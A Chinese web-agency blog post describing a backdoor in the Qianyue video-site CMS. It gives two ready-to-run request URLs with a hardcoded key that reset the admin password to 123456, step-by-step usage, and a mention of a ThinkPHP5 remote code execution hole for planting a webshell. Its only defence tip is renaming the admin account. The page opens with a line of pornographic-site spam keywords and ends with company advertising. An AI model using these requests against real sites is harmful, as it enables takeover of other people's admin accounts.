自拍亚洲一区欧美另类,亚洲成人影院,亚洲午夜久久久久妓女影院,最近中文字幕高清中文字幕无,亚洲熟妇av一区二区三区漫画

互聯(lián)網(wǎng)知識

精準(zhǔn)傳達(dá) ? 價值共享

洞悉互聯(lián)網(wǎng)前沿資訊,探尋網(wǎng)站營銷規(guī)律

千月影視HouMen

作者:狐靈安全組 | 2019-06-14 10:47 |點擊:


給你們解釋一下 第一段代碼是判斷 用戶名是否存在 第二段是修改 不光可以修改 管理員密碼 還可以修改代[過濾]理 知道用戶名就可以

因為時間問題 這里我說一下 千月用的是tp5 框架還有 遠(yuǎn)程執(zhí)行漏洞 直接放大馬

這個應(yīng)該是作者原本留的防止忘記密碼 但是被黑客利用了 


  1. 域名+/login/login/yzcode?username=admin&key=465454&password=123456
  2.  
  3.  
  4. 域名+/login/login/repass?username=admin&key=465454&password=123456
復(fù)制代碼


使用方法:我們先運(yùn)行第一段代碼,如果顯示成功,就是可以改密碼,然后我們在運(yùn)行第二段代碼就可以了。

然后賬號密碼就變成admin 123456

預(yù)防方法:我們把管理員用戶名更改一下,不要讓別人知道就改不了,我演示是給大家看
如沒特殊注明,文章均為狐靈科技原創(chuàng),轉(zhuǎn)載請注明?? "千月影視HouMen
多一份免費策劃方案,總有益處。

請直接添加技術(shù)總監(jiān)微信聯(lián)系咨詢

網(wǎng)站設(shè)計 品牌營銷

多一份參考,總有益處

聯(lián)系狐靈科技,免費獲得專屬《策劃方案》及報價

咨詢相關(guān)問題或預(yù)約面談,可以通過以下方式與我們聯(lián)系

業(yè)務(wù)熱線:15082661954 / 大客戶專線:15523356218